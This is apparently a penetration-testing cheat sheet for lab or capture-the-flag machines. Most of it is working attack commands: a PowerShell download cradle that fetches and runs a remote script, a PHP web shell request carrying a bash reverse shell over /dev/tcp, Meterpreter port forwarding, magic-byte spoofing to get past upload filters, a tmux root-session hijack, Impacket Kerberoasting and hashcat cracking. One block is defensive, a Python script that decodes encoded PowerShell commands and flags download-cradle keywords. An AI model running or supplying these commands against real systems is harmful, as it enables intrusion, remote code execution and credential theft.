
Powershell

Encode BASE64

  • cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
  • nc -lvnp 9001 (listener)
  • $username = 'username'
  • $password = 'password'
  • $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
  • $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
  • Enter-PSSession -ComputerName x.x.x.x -Port 5985 -Credential $credential

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/exploit.html')"
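Added defender-side example (not from the original post): the encoding shown above (UTF-16LE, then base64) is exactly the form PowerShell's -EncodedCommand takes, and it is what turns up in process-creation logs. This script decodes such a blob and flags download-cradle keywords and URLs for triage; the sample blob is constructed from the download string on this page, and the pattern list is an assumption.

```python
import base64
import re
from typing import Optional

# Constructed sample: the download cradle from this page, encoded the way the
# page does it (UTF-16LE, then base64), i.e. a valid -EncodedCommand value.
SAMPLE_CMD = "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/exploit.html')"
SAMPLE_B64 = base64.b64encode(SAMPLE_CMD.encode("utf-16-le")).decode()

# Assumed indicator list; extend with whatever your detection content uses.
CRADLE_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"downloadstring", r"downloadfile",
    r"net\.webclient", r"invoke-webrequest", r"frombase64string",
]


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand blob (base64 over UTF-16LE); None if it is not one."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if len(raw) % 2:            # UTF-16 needs an even byte count
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def triage(blob: str) -> dict:
    """Return the decoded command plus matched indicators and any URLs it contains."""
    decoded = decode_encoded_command(blob)
    if decoded is None:
        return {"decoded": None, "indicators": [], "urls": []}
    low = decoded.lower()
    hits = [p for p in CRADLE_PATTERNS if re.search(p, low)]
    urls = re.findall(r"""https?://[^\s'"()]+""", decoded)
    return {"decoded": decoded, "indicators": hits, "urls": urls}


if __name__ == "__main__":
    result = triage(SAMPLE_B64)
    print(result["decoded"])
    print("indicators:", result["indicators"])
    print("urls:", result["urls"])
```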


Port Knocking

Check for a port-knocking service

  • /etc/init.d$ ls
  • less knockd

Check the config file

  • /etc/default/knockd

Send a TCP packet to each required port, in order

for i in 571 290 911; do nmap -Pn -p $i --host-timeout 201 --max-retries 0 x.x.x.x; done


PHP

Upload a PHP command-execution script

https://www.acunetix.com/websitesecurity/php-security-2/

PHP shell

In the URL, request shell.php?command=whoami

In Burp Suite, create a POST request

POST /url/shell.php HTTP/1.1
body: command=bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'

URL-encode the body: command=bash+-c+'bash+-i+>%26+/dev/tcp/x.x.x.x/4444+0>%261'

Set up nc to listen for the incoming connection: nc -lvnp 4444


Nessus

/etc/init.d/nessusd start

Web UI: https://127.0.0.1:8834


Metasploit tips

systemctl start postgresql
cp /usr/share/exploitdb/exploits/cgi/webapps/42344.rb /root/.msf4/modules/exploits/cgi/webapps/
updatedb

sessions -u (upgrade a shell session to Meterpreter)
  • search delivery (web payload delivery modules)
  • search autoroute (route traffic through a session)
  • search smb_version
  • search arp_sweep

Vulnerability Scanning in Metasploit

db_nmap -v --script vuln 192.168.0.184
  • hosts
  • services

Port forwarding

portfwd add -l 3389 -p 3389 -r target-host

Forwards local port 3389 (RDP) to port 3389 on target-host, routed through the compromised machine running the Meterpreter session


Change Magic Bytes of files

python -c 'print "\x47\x49\x46\x38\x37\x61"' > test.txt (Python 2 print syntax; the bytes are the GIF87a signature)

https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/


Linux Checks

Hostname

hostname

Kernel Version

uname -a

Operating System

cat /etc/issue

Running processes

ps auxw

Running services

netstat -antp

Look at the top-level folders

  • ls /

Look for SUID files

  • find / -perm -4000 2>/dev/null

tmux session hijack

  • Running ps aux reveals a tmux session being run as the root user.
  • Running tmux -S /.devs/dev_sess attaches to that session's socket, giving a shell with full root privileges.


GREP password in files

grep -Ri password | less


Linux process monitor

#!/bin/bash
# Poll the process list once a second and print what appeared or disappeared.
IFS=$'\n'   # loop by line

old_process=$(ps -eo command)

while true; do
  new_process=$(ps -eo command)
  diff <(echo "$old_process") <(echo "$new_process")
  sleep 1
  old_process=$new_process
done


Check for GTFOBins

  • run sudo -l to see which commands you can execute with sudo rights
  • check https://gtfobins.github.io/ for ways those commands can be used to escalate to root

Check Linux read/write permissions

  • check that you have read permissions on the files: ls -la
  • check for a location where you do have write permissions
  • mkdir writelocation
  • cp -r /target/folder /writelocation


IPTABLES

NAT & Port Forwarding

  • iptables -A OUTPUT -o eth1 -j ACCEPT
  • iptables -A INPUT -i eth1 -j ACCEPT
  • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  • iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
  • iptables-save > /etc/iptables/rules.v4

Impacket

GetADUsers.py -all -dc-ip X.X.X.X domain/username

psexec.py domain/user@x.x.x.x

GetUserSPNs.py -request -dc-ip x.x.x.x domain/user (requests Kerberos service tickets for accounts with SPNs; feed the output to hashcat)


Hashcat

hashcat -m 1500 -a 0 hash /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt --force